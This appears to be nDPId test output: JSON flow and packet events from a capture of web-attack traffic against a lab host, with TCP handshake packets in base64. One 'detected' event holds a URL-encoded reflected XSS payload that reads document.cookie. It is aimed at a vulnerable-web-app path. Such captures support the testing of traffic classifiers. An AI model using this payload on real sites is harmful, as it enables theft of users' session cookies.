-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347159323,"flow_last_seen":1499347164659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54228,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347160581,"flow_last_seen":1499347165659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54242,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347160581,"flow_last_seen":1499347165659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54242,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347164459,"flow_last_seen":1499347169660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54282,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347164459,"flow_last_seen":1499347169660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54282,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2644,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347285114,"flow_last_seen":1499347285114,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347285114,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55564,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2644,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1499347285114,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347285114,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8AAxAAD4GxcSsEAABwKgKMtkMAFDF1B3mAAAAAKACchCCyAAAAgQFtAQCCAoBOh3qAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2645,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":2,"flow_last_seen":1499347285114,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347285114,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2Qzzh7fuxdQd56AScSDk7AAAAgQFtAQCCAoD4+9gATod6gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2646,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":3,"flow_last_seen":1499347285115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347285115,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0AA1AAD4GxcusEAABwKgKMtkMAFDF1B3n84e374AQAOWD9AAAAQEICgE6HeoD4+9g"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2655,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347286403,"flow_last_seen":1499347286403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347286403,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55578,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2655,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":1499347286403,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347286403,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8meVAAD4GK+usEAABwKgKMtkaAFAW6IbJAAAAAKACchDHgQAAAgQFtAQCCAoBOh8sAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2656,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":2,"flow_last_seen":1499347286403,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347286403,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2Rp9ePmhFuiGyqAScSBcwAAAAgQFtAQCCAoD4\/CiATofLAEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2657,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":3,"flow_last_seen":1499347286404,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347286404,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0meZAAD4GK\/KsEAABwKgKMtkaAFAW6IbKfXj5ooAQAOX7xwAAAQEICgE6HywD4\/Ci"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2667,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347287659,"flow_last_seen":1499347287659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347287659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55592,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2667,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1499347287659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347287659,"pkt":"ABm5CmnxAMGxFOsxCABFAAA814FAAD4G7k6sEAABwKgKMtkoAFDVWPfnAAAAAKACchCWqgAAAgQFtAQCCAoBOiBmAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2668,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":2,"flow_last_seen":1499347287659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347287659,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2Sh6EWHG1Vj36KAScSDF8QAAAgQFtAQCCAoD4\/HcATogZgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2669,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":3,"flow_last_seen":1499347287660,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347287660,"pkt":"ABm5CmnxAMGxFOsxCABFAAA014JAAD4G7lWsEAABwKgKMtkoAFDVWPfoehFhx4AQAOVk+QAAAQEICgE6IGYD4\/Hc"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2685,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347290163,"flow_last_seen":1499347290163,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347290163,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55618,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2685,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":1499347290163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347290163,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8D11AAD4GtnOsEAABwKgKMtlCAFDDfi2FAAAAAKACchBwWwAAAgQFtAQCCAoBOiLYAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2686,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":2,"flow_last_seen":1499347290164,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347290164,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2ULBAUn+w34thqAScSBuCAAAAgQFtAQCCAoD4\/ROAToi2AEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2687,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":3,"flow_last_seen":1499347290164,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347290164,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0D15AAD4GtnqsEAABwKgKMtlCAFDDfi2GwQFJ\/4AQAOUNEAAAAQEICgE6ItgD4\/RO"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2697,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347291442,"flow_last_seen":1499347291442,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347291442,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55632,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2697,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":1499347291442,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347291442,"pkt":"ABm5CmnxAMGxFOsxCABFAAA88hpAAD4G07WsEAABwKgKMtlQAFCuf9YCAAAAAKACchDbjgAAAgQFtAQCCAoBOiQYAAAAAAEDAwc="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2698,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":2,"flow_last_seen":1499347291443,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347291443,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2VCY8a8grn\/WA6AScSCa6QAAAgQFtAQCCAoD4\/WOATokGAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2699,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":3,"flow_last_seen":1499347291443,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347291443,"pkt":"ABm5CmnxAMGxFOsxCABFAAA08htAAD4G07ysEAABwKgKMtlQAFCuf9YDmPGvIYAQAOU58QAAAQEICgE6JBgD4\/WO"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2712,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347292725,"flow_last_seen":1499347292725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292725,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55646,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2712,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1499347292725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347292725,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Az5AAD4GwpKsEAABwKgKMtleAFDMWSZmAAAAAKACchBsAwAAAgQFtAQCCAoBOiVYAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2713,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":2,"flow_last_seen":1499347292725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347292725,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2V6LTEh8zFkmZ6AScSCeZwAAAgQFtAQCCAoD4\/bOATolWAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":3,"flow_last_seen":1499347292726,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347292726,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Az9AAD4GwpmsEAABwKgKMtleAFDMWSZni0xIfYAQAOU9bgAAAQEICgE6JVkD4\/bO"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347165741,"flow_last_seen":1499347171660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54296,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347165741,"flow_last_seen":1499347171660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54296,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347168302,"flow_last_seen":1499347173661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54322,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347168302,"flow_last_seen":1499347173661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54322,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347169573,"flow_last_seen":1499347174661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54336,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347169573,"flow_last_seen":1499347174661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54336,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347172098,"flow_last_seen":1499347177661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54362,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347172098,"flow_last_seen":1499347177661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54362,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347173373,"flow_last_seen":1499347178662,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54376,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347173373,"flow_last_seen":1499347178662,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54376,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2730,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347295224,"flow_last_seen":1499347295224,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347295224,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55672,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2730,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1499347295224,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347295224,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CihAAD4Gu6isEAABwKgKMtl4AFDbgS3hAAAAAKACchBS1QAAAgQFtAQCCAoBOifJAAAAAAEDAwc="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2731,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":2,"flow_last_seen":1499347295224,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347295224,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2XjDo5gx24Et4qAScSD6uwAAAgQFtAQCCAoD4\/k\/ATonyQEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":3,"flow_last_seen":1499347295224,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347295224,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CilAAD4Gu6+sEAABwKgKMtl4AFDbgS3iw6OYMoAQAOWZwwAAAQEICgE6J8kD4\/k\/"} -01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2733,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347291442,"flow_last_seen":1499347295227,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347295227,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55632,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27JUL2D3WXHEGWRAFJE2PI7OS71Z4Z8RFUHXGNFLUFYVP6M3OL55%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2743,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347296462,"flow_last_seen":1499347296462,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347296462,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55686,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 